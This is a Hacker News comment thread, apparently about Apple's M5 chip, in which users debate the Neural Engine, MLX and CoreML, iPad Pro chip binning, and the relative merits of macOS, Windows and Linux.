    • hannesfur 19 hours ago

      That would be an interesting approach if true. I hope someone gets to the bottom of it once we have hardware in our hands.

  • fooblaster 20 hours ago

    MLX doesn't use the neural engine still right? I still wish they would abandon that unit and just center everything around metal and tensor units on the GPU.

    • hannesfur 19 hours ago

      Oh, I overlooked that! You are right. Surprising… since Apple has shown that it’s possible through CoreML (https://github.com/apple/ml-ane-transformers)

      I would hope that the Foundation Models (https://developer.apple.com/documentation/foundationmodels) use the neural engine.

      • fooblaster 18 hours ago

        The neural engine not having a native programming model makes it effectively a dead end for external model development. It seems like a legacy unit that was designed for cnns with limited receptive fields, and just isn't programmable enough to be useful for the total set of models and their operators available today.

        • hannesfur 18 hours ago

          That's sadly true, over in x86 land things don't look much better in my opinion. The corresponding accelerators on modern Intel and AMD CPUs (the "Copilot PCs") are very difficult to program as well. I would love to read a blog post on someone trying though!

    • zozbot234 20 hours ago

      Wrt. language models/transformers, the neural engine/NPU is still potentially useful for the pre-processing step, which is generally compute-limited. For token generation you need memory bandwidth so GPU compute with neural/tensor accelerators is preferable.

      • fooblaster 19 hours ago

        I think I'd still rather have the hardware area put into tensor cores for the GPU instead of this unit that's only programmable with onnx.

    • llm_nerd 18 hours ago

      MLX is a training/research framework, and the work product is usually a CoreML model. A CoreML model will use any and all resources that are available to it, at least if the resource fits for the need.

      The ANE is for very low power, very specific inference tasks. There is no universe where Apple abandons it, and it's super weird how much anti-ANE rhetoric there is on this site, as if there can only be one tool for an infinite selection of needs. The ANE is how your iPhone extracts every bit of text from images and subject matter information from photos with little fanfare or heat, or without destroying your battery, among many other uses. It is extremely useful for what it does.

      >tensor units on the GPU

      The M5 / A19 Pro are the first chips with so-called tensor units. e.g. matmul on the GPU. The ANE used to be the only tensor-like thing on the system, albeit as mentioned designed to be super efficient and for very specific purposes. That doesn't mean Apple is going to abandon the ANE, and instead they made it faster and more capable again.

      • zozbot234 17 hours ago

        > ...and it's super weird how much anti-ANE rhetoric there is on this site, as if there can only be one tool for an infinite selection of needs

        That seems like a strange comment. I've remarked in this thread (and other threads on this site) about what's known re: low-level ANE capabilities, and it seems to have significant potential overall, even for some part of LLM processing. I'm not expecting it to be best-in-class at everything, though. Just like most other NPUs that are also showing up on recent laptop hardware.

      • almostgotcaught 18 hours ago

        > the work product is usually a CoreML model.

        What work product? Who is running models on Apple hardware in prod?

        • tehnub 10 hours ago

          Any iPhone or iPad app that does local ML inference?

          • almostgotcaught 8 hours ago

            Yes please tell us which apps those are

            • klausa 3 hours ago

              The keyboard. Or any of the features in Photos.app that do classification on-device.

        • llm_nerd 18 hours ago

          An enormous number of people and products. I'm actually not sure if your comment is serious, because it seems to be of the "I don't, therefore no one does" variety.

          • bigyabai 18 hours ago

            Enormous compared to what? Do you have any numbers, or are you going off what your X/Bluesky feed is telling you?

            • llm_nerd 18 hours ago

              I'm super not interested in arguing with the peanut gallery (meaning people who don't know the platform but feel that they have absolute knowledge of it), but enough people have apps with CoreML models in them, running across a billion or so devices. Some of those models were developed or migrated with MLX.

              You don't have to believe this. I could not care less if you don't.

              Have a great day.

              • bigyabai 18 hours ago

                I don't believe it. MLX is a proprietary model format and usually the last to get supported on Huggingface. Given that most iOS users aren't selecting their own models, I genuinely don't think your conjecture adds up. The majority of people are likely using safetensors and GGUF, not MLX.

                If you had a source to cite then it would remove all doubt pretty quickly here. But your assumptions don't seem to align with how iOS users actually use their phone.

                • llm_nerd 17 hours ago

                  Cite a source? That CoreML models are prolific on Apple platforms? That Apple devices are prolific? Search for it yourself.

                  You seem set on MLX and apparently on your narrow view of what models are. This discussion was about ANE vs "tensor" units on the GPU, and someone happened to mention MLX in that context. I clarified the role of MLX, but that from an inference perspective most deployments are CoreML, which will automatically use ANE if the model or some subset fits (which is actually fairly rare as it's a very limited -- albeit speedy and power efficient -- bit of hardware). These are basic facts.

                  >how iOS users actually use their phone.

                  What does this even mean? Do you think I mean people are running Qwen3-Embedding-4B in pytorch on their device or something? Loads of apps, including mobile games, have models in them now. This is not rare, and most users are blissfully unaware.

                  • kanaffa12345 17 hours ago

                    > That CoreML models are prolific on Apple platforms? That Apple devices are prolific?

                    correct and non-controversial

                    > An enormous number of people and products [use CoreML on Apple platforms]

                    non-sequitur

                    EDIT: i see people are not aware of

                    https://en.wikipedia.org/wiki/Simpson%27s_paradox

              • kanaffa12345 17 hours ago

                [flagged]

                • llm_nerd 17 hours ago

                  [flagged]

                  • koolala 17 hours ago

                    Can you share a example of apps you mean any maybe it would clear up any confusion?

  • xiphias2 13 hours ago

    My guess is that they moved the systolic arrays inside the GPU cores just like how it's done in modern NVIDIA chips.

    That's the only way to speed up MLX 4x compared to M4.

  • zuspotirko 18 hours ago

    ofc true. Unified memory is always less than vram. And my 16GB vram aren't enough.

    But I think it's also a huge issue Apple makes storage so expensive. If Apple wants local AI to answer your questions it should be able to take your calender, emails, text messages, photos, journal entries etc. into account. It can't do that as nicely as long as customers opt for only 256GB or 1TB devices due to cost

  • JKCalhoun 19 hours ago

    I can only guess that significant changes in hardware have longer lead times than software (for example). I suppose I am not expecting anything game-changing until the M6.

smolder 6 hours ago

Let's not pretend these are machines for hardcore computing jobs which belong on servers in terms of work/cost. Apples laptops are still amazing because we can do crazy amounts of work quickly without running out of battery. The edit, recompile, test loop is fast for programmers equipped with these expensive machines. And you can carry them everywhere without much risk of failure.

  • hmottestad 2 hours ago

    I don't think anyone is pretending that a Macbook Pro can compare to 8 H100 cards from Nvidia in terms of LLM training or for serving LLMs. But you can buy an awful many macbooks for the price of 8 H100 GPUs.

    But if your workload belongs on 8 H100 GPUs then there isn't much point in trying to run it on a macbook. You'd be better served by renting them by the hour, or if you have a quarter million dollars you can always just purchase them outright.

    The H100 is just an example, this is true for any workload that doesn't fit on a laptop.

  • croemer 2 hours ago

    If you work on scripts that run in a minute or two, it's not worth the hassle of running it on servers. Yet it's long enough that saving 50% is meaningful. I happen to often work on such tasks so I really notice improvements in single and multicore performance.

alberth 19 hours ago

Apple is binning the iPad Pro chips:

   Storage      CPU
   ≤ 512GB      3 P-cores (and 6 E-cores)
   1TB+         4 P-cores (and 6 E-cores)
https://www.apple.com/ipad-pro/specs/
  • ip26 5 hours ago

    The sales volumes of the 1TB+ models has got to be fairly low, which makes this fascinating. Since they are being somewhat quiet about it (rather than trumpeting "the 1TB+ models are even faster!") it suggests the P-cores don't yield well enough to support 4 P-cores in the 256GB and 512GB SKUs.

  • xangel 17 hours ago

    [flagged]

  • tempaccount420 15 hours ago

    Storage-gating is really disgusting considering how much Apple charges for storage.

    • aloer 14 hours ago

      iirc in the past it was about memory and that larger storage needs more memory for caching.

      So this made at least some sense.

      I guess yields might be good enough that they can afford to bin with another core in there as well.

      Memory is probably still the main reason for binning in the first place.

      • SchemaLoad 6 hours ago

        I figure it's probably just reducing SKUs. The people who care about the fastest chip are likely also the people wanting lots of storage so you can save on having to create a ton more products by bundling them.

      • alberth 9 hours ago

        My guess is that the lower-tier storage iPad Pro's are getting the "defective" MacBook Pro chips.

    • Schiendelman 9 hours ago

      Still? They really don't overcharge. The storage they sell is much, much, much faster than what everyone compares it to at lower prices.

      • tempaccount420 9 hours ago

        You can get Mac Studio 3rd party "SSDs" for less than half the price Apple charges for the same storage, with the same performance, they even use the same flash chips!

      • dzhiurgis 9 hours ago

        I wouldn’t mind some cheap slow storage. SD card / usb-c mini plugs aren’t really great option.

allthebestforus 36 minutes ago

Is this the first time Apple released just the base chip and not the Pro nor the Max version at the same time?

Are they trying to milk the market in small increments? Especially before Christmas.

The MBP 14 M5 release came a bit unexpected. Many analysts mentioned beginning of 2026.

When will M5 Pro and Max be released?

What are your thoughts on comparing M4 Pro against the base version of M5?

toddmorey 21 hours ago

The modern Apple feels like their hardware teams way outperforming the software teams.

  • linguae 20 hours ago

    This is not the first time this has happened in Apple’s history. The transition from the 68k architecture to the PowerPC brought major performance improvements, but Apple’s software didn’t take full advantage of it. If I remember correctly, even after the PowerPC switch, core elements of the classic Mac OS still ran in emulation as late as Mac OS 9. Additionally, the classic Mac OS lacked protected memory and preemptive multitasking, leading to relatively frequent crashes. Taligent and Copland were attempts to address these issues, but they both faced development hell, culminating with the purchase of NeXT and the development of Mac OS X. But by the time Mac OS X was released, PowerPC was becoming less competitive than the x86, culminating with the Intel switch in 2006. At this point it was Apple’s software that distinguished Macs from the competition, which remained the case until the M1 Macs were released five years ago.

    • mikepurvis 20 hours ago

      Sixteen years ago, John Gruber wrote:

      > Hardware and software both matter, and Apple’s history shows that there’s a good argument to be made for developing integrated hardware and software. But if you asked me which matters more, I wouldn’t hesitate to say software. All things considered I’d much prefer a PC running Mac OS X to a Mac running Windows.

      https://daringfireball.net/2009/11/the_os_opportunity

      At the time I'd only been a Mac user for a few years and I would have strongly agreed. But definitely things have shifted— I've been back on Windows/WSL for a number of years, and it's software quality/compatibility issues that are a lot of what keeps me from trying another Mac. Certainly I'm far more tempted by the hardware experience than I am the software, and it's not even really close.

      • selectodude 20 hours ago

        That’s so wild to me - my personal laptop is still a Mac but I’m in windows all day for work. Some of the new direction of macOS isn’t awesome but the basics are still rock solid. Touchpad is perfect, sleep works 100% of the time for days on end, still has UNIX underneath.

        • pico303 20 hours ago

          Same boat, and 100% agree. I couldn’t find a single example of Windows or Windows software where I think the experience is in any way better. Windows only saving grace, as a developer, is WSL.

          For a simple example, no app remembers the last directory you were working in. The keys each app uses are completely inconsistent from app to app. And it was only in Windows 11 that Windows started remembering my window configuration when I plugged and unplugged a monitor. Then there’s the Windows 95-style dialog boxes mixed in with the Windows 11-style dialog boxes; what a UI mess. I spoke with one vendor the other day who was actually proud they’d adopted a ribbon interface in their UI “just like Office” and I verbally laughed.

          From a hardware perspective, I still don’t understand why Windows and laptop manufacturers can’t get sleep working right. My Intel MacBook Pro with an old battery still sleeps and wakes and lasts for several hours, while my new Windows laptop lasts about an hour and won’t wake from hibernate half the time without a hard reboot.

          I think Windows is the “good enough” for most people.

          • BeetleB 18 hours ago

            > I couldn’t find a single example of Windows or Windows software where I think the experience is in any way better.

            While overall I may say MacOS is better, I would not say it's better in every way.

            Believe it or not, I had a better experience with 3rd party window managers in Windows than on MacOS.

            I don't think the automation options in MacOS are better than AutoHotKey (even Linux doesn't have something as good).

            And for corporate work, the integration with Windows is much better than anything I've seen on MacOS.

            Mac HW is great. The OS is in that uncanny valley where it's UNIX, but not as good as Linux.

            • robenkleene 16 hours ago

              > I don't think the automation options in MacOS are better than AutoHotKey (even Linux doesn't have something as good).

              Did you try Keyboard Maestro https://www.keyboardmaestro.com/main/ (I've never used AutoHotKey and I'd be super curious if there are deficiencies in KM relative to it, but Keyboard Maestro is, from my perspective, a masterpiece, it's hard to imagine it being any better.)

              Also I think this statement needs a stronger defense given macOS includes Shortcuts, Automator, and AppleScript, I don't know much about Windows automation but I've never heard of them having something like AppleScript (that can say, migrate data between applications without using GUI scripting [e.g., iterate through open browser tabs and create todos from each of them operating directly on the application data rather than scripting the UI]).

              • wingworks 13 hours ago

                Yeah, the things that AppleScript can do is so crazy. I've fully automated keeping 1 tab in Chrome logged into a website that insists on logging me out every hour or something. (not banking or anything)

          • jpalawaga 18 hours ago

            Mac also can't get sleep right. Have you tried to make a macbook consistently be 'awake' when the lid is closed?

            You can't, really. Almost everyone resorts to buying an HDMI dongle to fake a display. Apple solved the problem at such a low level, the flexibility to run something in clamshell mode is broken, even when using caffeine/amphetamine/etc etc etc.

            So, tradeoffs. They made their laptops go to sleep very well, but broke functionality in the process. You can argue it's a good tradeoff, just acknowledge that there WAS a tradeoff made.

            • cyberpunk 16 hours ago

              Counter-Example: I ran an air without a monitor connected for years using caffeine, worked perfectly for me..

          • prewett 18 hours ago

            > Windows only saving grace, as a developer, is WSL.

            So, Windows' saving grace is being able to run a different operating system inside it? Damning with faint praise if I ever heard it...

            • dboreham 16 hours ago

              Also the control key works.

              • simonh 16 hours ago

                Just enable space bar heating.

          • strbean 17 hours ago

            > And it was only in Windows 11 that Windows started remembering my window configuration when I plugged and unplugged a monitor.

            Oh god, I'm going to have to bite the bullet and switch to 11, huh?

            The one thing that has been saving me from throwing my PC out the window in rage has been the monitor I have that supports a "keep alive" mode where switching inputs is transparent to the computers connected to it. So when switching inputs between my PC and laptop neither one thinks the monitor is being disconnected/reconnected. If it wasn't for that, I'd be screaming "WHY ARE YOU MOVING ALL MY WINDOWS?" on a regular basis. (Seriously, why are you moving all my windows? Sure, if they're on the display that was just disconnected, I get you. But when I connect a new display, Windows 10 seems to throw a dart at the display space for every window and shuffle them to new locations. Windows that live in a specific place on a specific display 100% of the time just fly around for no reason. Please god just stop.)

        • oritron 20 hours ago

          > the basics are still rock solid

          A friend of mine lost a ton of messages when upgrading the OS (and therefore Mail). A number of others were affected by the same issue. There have been show-stopper bugs in the core functionality of Photos as well. I don't get the impression that the basics are Apple's focus with respect to software.

          • simonask 19 hours ago

            It’s not as if such bugs are unheard of for Windows users, and certainly not Linux users.

            But I’ve certainly never struggled with getting WiFi to work on a Mac, or struggled with getting it to sleep/wake, or a host of other problems you routinely have on both Windows and Linux.

            It’s not even close.

            • oritron 19 hours ago

              I haven't heard about surprise-your-files-are-deleted bugs in core programs of other systems. That's a bigger show-stopper in my opinion.

              To compare Apples to apples, you'd have to look at a Framework computer and agree that wifi is going to work out of the box... but here I'm meeting you on a much weaker argument: "Apple's software basics are /not/ rock solid, but other platforms have issues too"

              • robenkleene 16 hours ago

                > I haven't heard about surprise-your-files-are-deleted bugs in core programs of other systems. That's a bigger show-stopper in my opinion.

                I don't find your original anecdote convincing:

                > A friend of mine lost a ton of messages when upgrading the OS (and therefore Mail).

                E.g., what does this mean? They lost mail messages? How did they verify they had those messages before and after? E.g., file-system operations? GUI search? How much do they know about how Mail app stores message (e.g., I used to try understand this decades ago, but I expect today messages aren't even necessarily always stored locally)? How are you syncing mail messages, e.g., using native IMAP, or whatever Gmail uses, or Exchange? What's the email backend?

                E.g. without deeper evidence this sounds more like a mail message indexing issue rather than a mail-messages-stored-on-disk-issue (in 2025, I'd personally have zero expectations about how Mail manages messages on disk, e.g., I'd expect local storage of message to be dynamically managed like most applications that aren't document-based use a combination of cloud functionality and local caching, e.g., found this in a quick search https://apple.stackexchange.com/questions/471801/ensure-maco...), but if you have stronger evidence I'd love to hear it. But as presented your extrapolating much stronger conclusions than are warranted by the anecdote in my opinion.

                • oritron 14 hours ago

                  Mail deleted a large number of messages but not all of them. It was stored in files (which were smaller on disk, so not an indexing issue) and recovery required loading snapshots from Time Machine, converting to a format Thunderbird could import and transitioning to that.

                  • robenkleene 14 hours ago

                    You've only addressed something like 30% of the issues I asked about (although I'm honestly impressed you got that far), e.g., I wouldn't call Apple Mail an application designed to managed a collection of emails on disk. Isn't the important question here whether the emails were still stored on the server? E.g., or were they using POP?

            • afandian 19 hours ago

              I've been using Mac OS since 10.3 and, whilst it's better now, I've had a memorable number of of wifi connection bugs. And ISTR issues with waking from sleep, but that might have been before the Intel migration. It's never been immune from bugs.

            • philsnow 17 hours ago

              > But I’ve certainly never struggled with getting WiFi to work on a Mac

              I want to be able to set different networking options (manual DNS, etc) for different wifi networks, but as far as I can tell, I can only set them per network interface.

              There's something like "locations" but last time I tried using that, the entire System Settings.app slowed to a crawl / beachballed until I managed to turn it back off.

              > or struggled with getting it to sleep/wake

              My m1 MBP uses something like 3-5% of its battery per hour while sleeping, because something keeps waking it up. I tried some app that is designed to help you diagnose the issue but came up empty-handed.

              ... but yes on both counts, it's light years better than my last experience with Linux, even on hardware that's supposed to have fantastic support (thinkpads).

        • a456463 11 hours ago

          I come back to my work MBP M2 dead almost everyday and I have to leave it charged or wait 15 minutes for Mac to decide that it is okay to boot even when the power has been connected.

        • eitally 19 hours ago

          I've been primarily on a Macbook for the past three years, after almost 10 years using Chromebooks as my primary machines (yay work at Google). Until 2015, I had been a rabid defender of Thinkpads (T-series, mostly), and used Windows at work and Linux (mostly Kubuntu) at home, from around 2009-2015.

          Long story short, I was very happy with the "it just works" of ChromeOS, and only let down by the lack of support for some installed apps I truly needed in my personal life. I tried a Mac back in 2015 but couldn't get used to how different it was, and it felt very bulky compared to ChromeOS and much slower than the Linux machine I'd had, so I switched to a Pixelbook as was pretty content.

          Fast forward to 2023 when I needed to purchase a new personal laptop. I'd bought my daughter a Pixelbook Go in 2021 and my son a Lenovo x1 Carbon at the same time. Windows was such a dumpster fire I absolutely ruled it out, and since I could run all the apps I needed on ChromeOS it was between Linux & Mac. I decided to try a Mac again, for both work & personal, and I've been a very happy convert ever since.

          My M2 Pro has been rock solid, and although I regret choosing to upgrade to Sequoia recently, it still makes me feel better than using Windows. M4 Pro for work is amazingly performant and I still can't get over the battery efficiency. The nicest thing, imho, is that the platform has been around long enough for a mature & vibrant ecosystem of quality-of-life utilities to exist at this point, so even little niggles (like why do I need the Scroll Reverser app at all?) are easy to deal with, and all my media editing apps are natively available.

          • TheAmazingRace 14 hours ago

            Sequioa is honestly a sorry sight better than Tahoe. It's only downhill from here!

        • sofixa 19 hours ago

          > sleep works 100% of the time for days on end

          In my case it works roughly ~50% of the time. Probably because of the Thunderbolt monitor connected to power it, idk.

          > the basics are still rock solid

          The basics like the OS flat out refusing to provide you any debugging information on anything going wrong? It's rock solid allright. I had an issue where occasionally I would get an error "a USB device is using too much power, try unplugging it and replugging it." Which device? Why the hell would Apple tell you that, where is the fun in that?

          Key remapping requires installing a keylogger, nor can you have a different scroll direction between mouse and touchpad. There still isn't window management which for the sizes of modern monitors is quite constraining.

          > still has UNIX underneath

          A very constrained UNIX. A couple of weeks ago I wanted to test something (pkcs11-tool signing with a software HSM), and turns out that Apple has decided that libraries can only be loaded from a number of authorised locations which can only be accessed while installing an application. You can't just use a dynamic library you're linking to, it has to be part of a wider install.

        • MichealCodes 20 hours ago

          The basics are not rock solid. Even a core feature such as remote management crashes and freezes every 5 minutes when you connect from a non-apple machine, many have reported this over years but Apple just does Apple. Safari is still atrocious when it comes to web api supports. The worst part is, with Apple, we do not know if these are intentional anti-competitive barriers or actual software bugs. I purchased a mac mini simply to compile apps via xcode and can say the core experience is MUCH more buggy than a fresh Windows or Ubuntu install.

          Edit: Hard to call intentionally preventing support for web apis a power user thing. This creates more friction for basic users trying to use any web app.

          Edit2: lol Apple PR must be all over this, went from +5 to -1 in a single refresh. Flagged for even criticizing what they intentionally break.

          • selectodude 20 hours ago

            Safari adds hours of battery life due to its hyper focus on power consumption. The level to which web API standards are affected is rather immaterial to me. I imagine we’re different consumers though.

            • MichealCodes 20 hours ago

              Adds hours of battery life to the expense of making your microphone input completely inaudible due to throttling if you background the tab it's running on.

              On iOS you cannot even keep a web app running in the background. The second they mutlitask, even with an audio/microphone active, Apple kills it. Are they truly adding battery life or are they cheating by creating restrictions that prevent apps from working?

              Being able to conduct a voice call through the browser seems like a pretty basic use case to me.

            • socalgal2 18 hours ago

              If you’re comparing to Chrome, tests show it’s no longer true

            • ahmeneeroe-v2 18 hours ago

              I am in the same boat. I prefer battery life

              • MichealCodes 18 hours ago

                Breaking things is not extending battery life. Battery life assumes functionality. Breaking functionality to extend it is a scapegoat and the break-whatever-you-want could be provided as a mode instead of one-size fits all, we don't care what breaks approach.

          • butlike 20 hours ago

            They said the basics are rock solid (to which I agree). What you're describing, I'd consider a "power user."

          • astrange 18 hours ago

            Why would you want to support web APIs? They're all just Google proposing 5000 new ways for advertisers to fingerprint you but doing it through "standards".

            • MichealCodes 17 hours ago

              Nice strawman. The core of webapis is about opening up lower level functionality from the sandbox/accessibility of the web. Beyond audio and video IO, there's great stuff coming with webgpu and webNN. Web apps are much safer and much more convenient than downloading an app, well in theory they could be if support wasn't regularly sabotaged to protect a corporate interest in walled gardens.

          • foldr 20 hours ago

            Are those basics? You don’t have to use Safari, and I’ve never used remote management over the 20 years or so that I’ve been a Mac user.

            • MichealCodes 20 hours ago

              If we dismiss remote management as a non-core feature shouldn't we consider installing a new browser to be advanced usage as well?

              I understand that this post is about MacOS, but yes, we are forced to support Safari for iOS. Many of these corporate decisions to prevent web apps from functioning properly spill over from MacOS Safari to iOS Safari.

      • KeplerBoy 20 hours ago

        I bet most people around here would prefer fully supported linux over mac os on their apple silicon.

        • vuggamie 20 hours ago

          The best part of MacOS for me is the unix tools. The command line is a real unix command line. And the rest just works. If I need a linux environment I ssh into a VPS.

          • BeetleB 18 hours ago

            > If I need a linux environment I ssh into a VPS.

            I want good window management. Linux gives me a huge number of options. MacOS - not as much.

          • ghaff 19 hours ago

            It doesn't matter for everyone/most. But, yes, having a Unix command line within MacOS is a pretty big win for some of us. Not something I use on a daily basis certainly. And I'd probably set up a Linux box (or ssh into one) if I really needed that routinely. But it's a nice bonus.

          • a456463 11 hours ago

            Unix tools that are barely supported by an external community via brew or macports? Mac is not a dev machine. It is a dev hostile machine.

          • epistasis 20 hours ago

            Or even just containers on the Mac. Unless you need a GPU with specific hardware, or to connect to a cluster, there's ever decreasing need to use remote boxes.

          • Daneel_ 19 hours ago

            Well, kind of.. the commands on Mac OS all just a little bit different and a little bit janky. I still had to relearn all the common commands I use in order to function. I survived 6 months before I went back to a Windows/WSL combo.

            • MobiusHorizons 19 hours ago

              Notice the op said Unix not Linux. Gnu made a lot of incompatible changes from the Unix tools it was cloning. Many people in the Linux community prefer the GNU quirks (they are definitely more performance optimized for example). But if you are talking about Unix, the FreeBSD derived userland on a Mac has real Unix lineage.

            • epistasis 19 hours ago

              If you want the GNU versions of tools rather than the Mac POSIX versions, then brew can help replace your bin directory with all the GNU niceties.

              If you're talking about hardware interaction from the command line, that's very different and I don't think there's a fix.

        • pxc 20 hours ago

          Fully supported Linux + proper suspend-to-RAM are the two things I want out of Apple Silicon and may never quite get. Better online low power states are fine, but I want suspend-to-RAM and suspend-then-hibernate.

          If I close my laptop for a few days, I don't want significant battery drain. If I don't use it for two weeks, I want it to still have life left. And I don't want to write tens of gigabytes to disk every time I close the lid, either!

          • zozbot234 19 hours ago

            What happens if you enable airplane mode before closing the laptop? That should power down all radios so battery drain should be approximately equivalent to S3 standby.

          • ValdikSS 18 hours ago

            Sleep states are not trivial from the security perspective, and they've eliminated the issue by just not allowing it :)

            • astrange 16 hours ago

              It does hibernate. It just takes a long time to do it because the experience of waking up from it is bad.

        • geodel 20 hours ago

          "Fully supported by whom" is the issue and important one. Apple won't do it and going by support from "most people around here" Hector Martin et al got crumbs for years, nowhere near to support the development.

          One can just hand wave "Apple must support Linux and all" but that is not going to get anything done.

        • 7e 19 hours ago

          Linux is a vanity and the illusion is only skin-deep. The overall UX truly sucks.

          • artisin 16 hours ago

            The UX only sucks if you're unwilling to put in a minimal amount of time and effort. After that, it has no equal; it is, by definition, the opposite of vanity.

          • KeplerBoy 18 hours ago

            Which illusion? It's a computer, no more, no less and Linux is a perfectly fine interface to that computer.

          • rowanG077 17 hours ago

            I don't understand. From a pure visual standpoint OSX beats. Linux is not particularly known for looking good or cohesive. But in basically all matters it beats the pants of OSX.

        • Romario77 20 hours ago

          Linux UI is crap compared to Mac.

          It's a server or developer box first and a non-technical user second.

          • timschmidt 20 hours ago

            I've felt the opposite for more than a decade. On Linux, it's relatively easy for me to choose a set of applications which all use the same UI toolkit. Additionally, the web browser is often called "Web Browser" in the application launcher, LibreOffice Writer "Word Processor", and so on. In general there is far less branding and advertisement and more focus on function. Linux was the first OS with an "app store" (the package manager). CLI utilities available tend to be the full fat versions with all the useful options, rather than minimalist versions there to satisfy posix compatibility. I could go on.

            On Linux there is variety and choice, which some folks dislike.

            But on the Mac I get whatever Apple gives me, and that is often subject to the limitations of corporate attention spans and development budgets.

            • robenkleene 15 hours ago

              > The web browser is often called "Web Browser" in the application launcher, LibreOffice Writer "Word Processor", and so on. In general there is far less branding and advertisement and more focus on function.

              Should Emacs and Vim both be called "Editor" then?

              To me, this is actually a great example of the problems with Linux as a community, that GUI applications seem to just be treated as placeholders (e.g., all word processors are the same?), but then its inconsistent by celebrating the unique differences between editors like Vim and Emacs. Photoshop, Excel, Logic Pro, Final Cut Pro are, in my opinion, crown jewels of what we've accomplished in computing, and by extension some of the greatest creations of the human race, democratizing tasks that in some cases would have cost millions of dollars before (e.g., a recording studio in your home). Relegating these to generic names like "spreadsheet", makes them sound interchangeable, when in my opinion they're each individual creations of great beauty that should wear their names with pride. They've helped improve the trajectory of the human race by facilitating many individuals to perform actions they never would have had the resources to do otherwise.

              • timschmidt an hour ago

                > Should Emacs and Vim both be called "Editor" then?

                I've used some distributions in which they were. Tooltips and icons were provided to disambiguate. Worked for me.

                Other distributions name applications explicitly, some place them in a folder together named "Editors".

                None of the distributions I've used place either in a corporate branded subfolder as is typical on Windows and Mac.

                Freedom of choice is wonderful.

            • MichealCodes 20 hours ago

              > limitations of corporate attention spans and development budgets

              And arbitrary turf wars like their war against web apis/apps causing more friction for devs and end users.

              • ahartmetz 16 hours ago

                I'm a Linux fan and I like that Apple isn't rubber-stamping the two new web APIs a week that Google comes up with. There are hundreds of them, most of them quite small fortunately.

          • gedy 20 hours ago

            That was maybe the case 10+ years ago but honestly have been using Fedora with Gnome on my M1, it's pretty polished and nice now.

          • markus_zhang 20 hours ago

            [flagged]

            • jll29 19 hours ago

              You are right in saying that discoverability has suffered much, by hiding scrollbar and similar changes. Also, you need to move the mouse precisely to a particular spot to re-enable the scrollbars, there is little wiggle room, which may may things harder for handicapped people, older users, or people on the move (e.g. me on a train).

              • markus_zhang 16 hours ago

                Yeah, e.g. when you have a very short scrollbar and had to guess where it is for more than 5 seconds...I'm kinda grow past that hype, nada, going back to Winux.

                It is SUCH a pity that they have extraordinary hardware (even with the price point I'd still consider it a bargin, especially for the air/mini)...

            • MichealCodes 19 hours ago

              Or just the way the menus are on apps. Some app implement their own file/edit/view menus at the top of the app, then some will use the apple version at the top of the OS. If you plug in a TV to use as a monitor and cannot adjust the aspect ratio you're forced to blindly activate these menus as they're clipped from the screen.

              MacOS folder navigation is a complete pain too, sometimes you see the list of OS folders, sometimes you see only the folder you opened in finder. If the menu is clipped due to the above aspect ratio problem, good luck getting to your home folder... No functionality to easily open a folder in terminal. Lots of basics just counter-intuitive.

              • markus_zhang 15 hours ago

                Yeah, I found it not easy to go up one level in finder. Actually I had to Google when I tried first time. The way that MacOS wants to conceal information from the users is just insane. I don't know how it is justified. Nevertheless it has a good number of ardent fans.

      • foobarian 15 hours ago

        To me it's not a MacOS vs Windows thing. It's a hardware build quality thing for sure; but even more importantly it's the integration with the OS. Now, you could say we could get a team together and integrate Windows too, but the problem is this is vastly more effective when the hardware and software are co-designed in the same house with strong feedback loops. As a result Apple's product will inevitably be better than those without such an organizational backbone.

        Quoth the Tao of Programming:

        8.4

        Hardware met Software on the road to Changtse. Software said: "You are Yin and I am Yang. If we travel together, we will become famous and earn vast sums of money." And so they set forth together, thinking to conquer the world.

        Presently, they met Firmware, who was dressed in tattered rags and hobbled along propped on a thorny stick. Firmware said to them: "The Tao lies beyond Yin and Yang. It is silent and still as a pool of water. It does not seek fame; therefore, nobody knows its presence. It does not seek fortune, for it is complete within itself. It exists beyond space and time."

        Software and Hardware, ashamed, returned to their homes.

      • qwertytyyuu 20 hours ago

        these days i'd rather have macbook running windows than macos running on standard windows laptop of the same form factor, purely for the efficiency of apple silicon.

        • floam 16 hours ago

          It wouldn’t be so power efficient anymore.

      • klooney 17 hours ago

        Advertisements in Windows seem like a deal breaker to me, but I've been gone for a while.

      • lenkite 19 hours ago

        Windows would have beat MacOS only if Microsoft had just done one small, teeny-weeny thing - just left the OS alone after Win 10.

        • xedrac 19 hours ago

          I haven't been able to stomach Windows since Vista, and I can barely stomach MacOS. Linux has spoiled me.

        • dysoco 15 hours ago

          Oh but they absolutely did beat MacOS. The amount of people who give a damn about UI polish, response times, etc. is insignificant to them.

          They got away with pushing ads, online and enterprise services, Copilot, etc. to every desktop user.

        • NetMageSCW 11 hours ago

          I think you meant to say Windows 7…

        • leptons 17 hours ago

          It depends on what you mean by "beat". Windows has a vastly larger market share than Apple ever has, or ever will.

      • lotsofpulp 19 hours ago

        Seeing my wife have to deal with BSOD and tedious restarts for Windows updates and myriad just to use Teams/Excel makes me think the software issues are far worse on the Windows side.

        Not once in 10 years have I had ti troubleshoot while she uses her personal macOS, but a Dell Latitude laptop in 2025 still can’t just “open lid, work, close lid”.

        And it’s slower. And eats more battery.

    • larodi 17 hours ago

      Curiously every big player/vendor doing something remotely relevant to GPU/NPU/APU etc. sees massive growth. Apple's M-processors are much better in terms price/value ratio for current ML pipelines. But Apple do not have server line, which then seems to be super massive problem for their products, even though their products actually compete with NVidia in the consumer market, which is very substantial position, software or not.

      AMD was also lagging with drivers, but now we see OpenAI swearing they gonna buy loads of their products, which so many people were not favor of liek just 5-7 years ago.

  • samwillis 20 hours ago

    Software is very easy to bloat, expand scope, and grow to do more than really needed, or just to release apps that are then forgotten about.

    Hardware is naturally limited in scope due to manufacturing costs, and doesn't "grow" in the same way. You replace features and components rather than constantly add to them.

    Apple needs someone to come in and aggressively cut scope in the software, removing features and products that are not needed. Pair it down to something manageable and sustainable.

    • pxc 20 hours ago

      > pare down products and features

      macOS has way too many products but far too few features. In terms of feature-completeness, it's already crippled. What OS features can macOS afford to lose?

      • coredog64 20 hours ago

        I would say it's less about losing and more about focus. Identify the lines of business you don't want to be in and sell those features to a third party who can then bundle them for $1/$10/$20. A $2T company just doesn't care, but I would bet that those excised features would be good enough for a smaller software house.

        (I have the same complaint about AWS, where a bunch of services are in KTLO and would be better served by not being inside AWS)

    • 6SixTy 17 hours ago

      macOS has like no features already, and they keep removing more.

    • panick21_ 19 hours ago

      If you think hardware can't bloat, I suggest you look into the history of Intels attempt to replace x86. Or the VAX. Not to mention tons of minicomputer companies who built ever more complex minis. And not to mention the supercomputer startup bubble.

  • geodel 21 hours ago

